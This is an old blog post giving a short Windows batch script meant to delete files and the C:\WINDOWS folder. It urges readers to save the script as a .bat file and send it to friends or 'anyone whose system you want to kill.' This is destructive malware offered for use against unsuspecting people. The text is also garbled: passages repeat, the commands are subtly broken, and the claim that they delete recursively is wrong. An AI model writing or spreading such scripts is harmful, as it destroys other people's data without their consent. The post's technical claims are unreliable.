Saturday, 28 May 2011
Kill Windows System With Batch File
This is a very useful two lines code that can be pretty dangerous if executed especially if there's a higher privilege in the windows OS(works well on XP, not tested on other windows versions).
Open the notepad and type following lines of code:
The above line of code deletes everything recursively without asking for any confirmation.
In the case you want to delete certain folder entirely(C:\windows in this example), type the following line of code in notepad:
Now save the file as filename.bat and send it to your friends or anyone whose system you want to kill. On clicking this batch file, very bad things are gonna happen. So be warned not to click when the file is in your system.
Open the notepad and type following lines of code:
del /f /q *
erase C:WINDOWS
erase C:WINDOWS
The above line of code deletes everything recursively without asking for any confirmation.
In the case you want to delete certain folder entirely(C:\windows in this example), type the following line of code in notepad:
erase c:windows
Now save the file as filename.bat and send it to your friends or anyone whose system you want to kill. On clicking this batch file, very bad things are gonna happen. So be warned not to click when the file is in your system.
Labels:
batch programming,
tricks and tips
Bookmark this post:blogger tutorials
Social Bookmarking Blogger Widget |
Kill Windows System With Batch File
2011-05-28T23:58:00+05:45
Cool Samar
batch programming|tricks and tips|
Subscribe to:
Post Comments (Atom)